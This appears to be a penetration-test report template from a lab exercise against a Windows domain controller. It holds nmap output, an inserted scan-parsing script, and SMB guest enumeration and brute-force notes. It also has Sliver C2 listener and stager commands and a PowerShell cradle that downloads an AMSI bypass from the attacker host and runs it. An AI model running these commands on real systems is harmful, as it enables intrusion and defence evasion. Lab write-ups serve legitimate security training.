Detailed Findings and Recommendations

The scope of this penetration test is to identify and exploit vulnerabilities and to report the results of the penetration test performed on the following set of IP addresses.

ID          IPs            Name          DC
Machine 1   10.10.76.112   DC.BABY2.VL

Enumeration

Nmap

The initial scan results for machine 1 show a number of open ports on the machine:

sudo nmap -sC -sV -oA baby2 10.10.201.37
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-08 14:22:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-08T14:24:18+00:00; +6s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-05-08T14:23:38+00:00
| ssl-cert: Subject: commonName=dc.baby2.vl
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows


Changing the /etc/hosts file

The domain and host names reported by the scan (baby2.vl, dc.baby2.vl) are added to /etc/hosts so that they resolve to the target.
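The following Python script is added here as an example and is not part of the original assessment notes. It parses the nmap normal-output lines shown above, flags the host as a domain controller from the combination of Kerberos, LDAP, LDAPS and global catalog ports, and builds the /etc/hosts entry from the names in the rdp-ntlm-info block. The scan text is copied from the output above and embedded inline so the script runs offline; the IP passed to hosts_line and the DC_PORTS heuristic are assumptions of the example, not something the notes state.

```python
import re

# Constructed sample: the nmap -sC -sV normal-output lines for the DC,
# copied from the scan above so the script runs without a live target.
NMAP_OUTPUT = """\
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-08 14:22:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-08T14:24:18+00:00; +6s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-05-08T14:23:38+00:00
| ssl-cert: Subject: commonName=dc.baby2.vl
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# One key/value line inside an NSE script block: "|   Key: value" or "|_  Key: value"
NTLM_RE = re.compile(r"^\|_?\s+(\w+):\s+(.+?)\s*$")

# Heuristic (assumption of this example): Kerberos, LDAP, LDAPS and the
# global catalog open together indicate an Active Directory domain controller.
DC_PORTS = {88, 389, 636, 3268}


def parse_ports(text):
    """Return a list of (port, proto, state, service, version) tuples."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append((int(port), proto, state, service, version or ""))
    return ports


def parse_rdp_ntlm_info(text):
    """Return the key/value pairs of the rdp-ntlm-info script block."""
    info = {}
    in_block = False
    for line in text.splitlines():
        if line.startswith("| rdp-ntlm-info:"):
            in_block = True
            continue
        if in_block:
            m = NTLM_RE.match(line)
            if not m:
                break  # a different script block or end of the host section
            info[m.group(1)] = m.group(2)
            if line.startswith("|_"):
                break  # "|_" marks the last line of an NSE script block
    return info


def hosts_line(ip, info):
    """Build the /etc/hosts entry for the names nmap reported, without duplicates."""
    names = []
    for key in ("DNS_Computer_Name", "DNS_Domain_Name", "DNS_Tree_Name", "NetBIOS_Computer_Name"):
        name = info.get(key, "").lower()
        if name and name not in names:
            names.append(name)
    return f"{ip} " + " ".join(names)


def is_domain_controller(ports):
    """True when every port in DC_PORTS is reported open."""
    open_ports = {p for p, _, state, _, _ in ports if state == "open"}
    return DC_PORTS <= open_ports


if __name__ == "__main__":
    ports = parse_ports(NMAP_OUTPUT)
    info = parse_rdp_ntlm_info(NMAP_OUTPUT)
    for port, proto, state, service, version in ports:
        print(f"{port:>5}/{proto} {service:<14} {version}")
    print("Domain controller:", is_domain_controller(ports))
    # The IP is the one used for the scan above; adjust it for the target in use.
    print(hosts_line("10.10.201.37", info))
```

The hosts entry is printed rather than written, so the operator can review it before appending it to /etc/hosts; the same parser works on any nmap normal-output file that contains an rdp-ntlm-info block.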

cme smb 10.10.79.222 -u 'guest' -p '' --shares
smbclient.py 'guest@10.10.79.222'

Got Users

Brute force again

smbclient.py 'library:library@10.10.79.222'
  • Found login.vbs in the SYSVOL scripts folder

VBS script

  • Got the initial shell
whoami /all

Sliver

https -L 10.8.2.41 -l 443
stage-listener --url https://10.8.2.41:8446 --profile vulnhub64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
(New-Object System.Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt') | IEX

Additional Items

Appendix - AMSI Bypass code

Appendix - Powershell Shellcoderunner

Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code

Appendix - Risk Assessment Matrix

Appendix - Proof and Local Contents

Hostname   local.txt Contents   proof.txt Contents
HOSTNAME   foobar
HOSTNAME   foobar

Appendix - Credentials obtained

NTLM Hashes

Username        NTLM Hash   Found in
Administrator   HASH        HOSTNAME

Passwords

Found in   Corresponds to   Password
HOSTNAME   USER BELONGS     Password123*

Credential files

Found in   File                     Type
HOSTNAME   FILE FROM WHERE IS IT    Example: SSH Priv. Key